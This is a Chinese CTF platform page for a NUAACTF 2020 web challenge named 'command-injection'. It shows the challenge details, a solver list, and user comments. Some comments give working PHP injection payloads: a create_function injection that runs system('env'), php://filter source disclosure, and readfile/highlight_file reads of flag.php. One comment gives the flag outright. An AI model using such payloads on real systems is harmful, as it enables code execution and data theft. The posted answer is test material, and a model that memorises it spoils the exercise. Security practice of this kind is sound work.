command-injectionWEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 212
提  示:
描  述:
nuaactf{}
评论
vincentshine 6月前

不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行

回复 0

xiaobai568 1年前

createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试

回复 0

coolsword2023 1年前

createfun.php?func=create_function&&arg=){}system("env");//

回复 0
xiaoxiao972521 1年前

这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php

回复 0

zhaiye 1年前

nuaactf{php_IS_thE_best_language}

回复 0

justsosoloveyou 1年前

html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php

回复 1

hopeinhand 1年前

注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php

回复 5

WriteUp

image
2901600657

3 金币

评分(0)

暂无评分

解题动态

18630451800 攻破了该题 1天前
余长生o 攻破了该题 3天前
senxiang 攻破了该题 6天前
dongwanli 攻破了该题 6天前
LuoTianYi 攻破了该题 19天前
GnawKing 攻破了该题 21天前
hxnter 攻破了该题 24天前
daidai0107 攻破了该题 25天前
brant 攻破了该题 1月前
19513396653 攻破了该题 1月前
2845985939 攻破了该题 1月前
sssmmmmmm 攻破了该题 1月前
zaidengyiyechunyu 攻破了该题 1月前
蟹堡王第一厨师长 攻破了该题 1月前
17857024334 攻破了该题 1月前
YYYCC 攻破了该题 1月前
Waitcat 攻破了该题 2月前
下雨天y 攻破了该题 2月前
梦游的小狐狸 攻破了该题 2月前
Cirsis 攻破了该题 2月前
问题反馈